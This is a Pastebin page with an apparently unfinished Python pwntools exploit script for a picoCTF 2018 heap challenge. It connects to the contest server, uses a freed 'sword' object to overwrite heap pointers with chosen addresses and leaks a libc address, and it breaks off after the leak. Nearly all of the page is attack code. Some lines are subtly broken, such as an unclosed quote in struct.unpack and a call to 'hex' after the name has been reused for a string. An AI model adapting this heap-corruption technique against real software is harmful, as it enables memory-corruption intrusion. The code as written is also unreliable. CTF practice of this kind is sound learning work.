daily pastebin goal
63%
SHARE
TWEET

Untitled

a guest Mar 25th, 2019 63 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. import struct
  3. import binascii
  4.  
  5. read = 0x602040
  6. readoffset = 0x004007b0
  7. hoo = 0x400b9d
  8. weight = '-1' #prevents blademaster getting angry because saves a lot of time
  9. context.log_level = 'debug'
  10.  
  11. # forges a sword
  12. def makeSword(p):
  13.     p.recvuntil('Quit.')
  14.     p.sendline('1')
  15.     return
  16.  
  17. def freeSword(p, i):
  18.     p.recvuntil('Quit.')
  19.     p.sendline('4')
  20.     p.recvuntil('index of the sword?')
  21.     p.sendline(str(i))
  22.     return
  23.  
  24. def harden(p, i, len, string):
  25.     p.recvuntil('Quit.')
  26.     p.sendline('5')
  27.     p.recvuntil('index of the sword?')
  28.     p.sendline(str(i))
  29.     p.recvuntil('sword name?')
  30.     p.sendline(str(len))
  31.     p.recvuntil('sword name.')
  32.     p.sendline(string)
  33.     p.recvuntil('weight of the sword?')
  34.     p.sendline(weight)
  35.     return
  36.    
  37. def equip(p, i):
  38.     p.recvuntil('Quit.')
  39.     p.sendline('6')
  40.     p.recvuntil('index of the sword?')
  41.     p.sendline(str(i))
  42.     result = p.recvuntil('so cooool!')
  43.     # from debug output of pwn tools, know the index of libc address starts at 13
  44.     temp = result[13:19]
  45.     hex = binascii.hexlify(temp[::-1])
  46.     temp2 = struct.unpack('L, temp + '\x00\x00')
  47.     libc = hex(int(temp2[0]))
  48.     return libc
  49.    
  50.  
  51. p = remote('2018shell1.picoctf.com', 10491)
  52. # make two swords
  53. makeSword(p)
  54. makeSword(p)
  55. freeSword(p, 0) # freeing sword at 0
  56. # crafting string payload exploit to send in to manipulate the heap
  57. # the x08 takes the spot of name len
  58. exploit1 = '\x08'*8 + struct.pack('L', read) + struct.pack('L', hoo) # *8 since two integers - 8 bytes
  59. harden(p, 1, 32, exploit1)
  60. libcBase = equip(p, 0)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top